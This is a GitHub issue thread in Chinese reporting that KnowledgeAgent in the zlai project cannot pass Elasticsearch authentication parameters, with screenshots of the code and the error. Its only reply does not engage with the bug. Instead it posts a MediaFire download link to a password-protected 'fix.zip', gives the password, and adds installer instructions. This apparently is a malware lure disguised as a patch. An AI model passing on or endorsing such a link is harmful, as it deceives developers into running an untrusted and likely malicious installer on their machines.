### ISSUE TITLE
KnowledgeAgent无法使用es的验证

### ISSUE THREAD

**Issue by xukache** [zlai-llm/zlai#6]
代码如下：
![image](https://github.com/user-attachments/assets/ba9a1ee3-7551-46df-8b34-a905d1f00a62)
需要增加验证的参数
报错如下：
![image](https://github.com/user-attachments/assets/5d560f47-de1e-4d5e-bcd2-006564ea16ea)
版本如下：0.3.115+windows

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
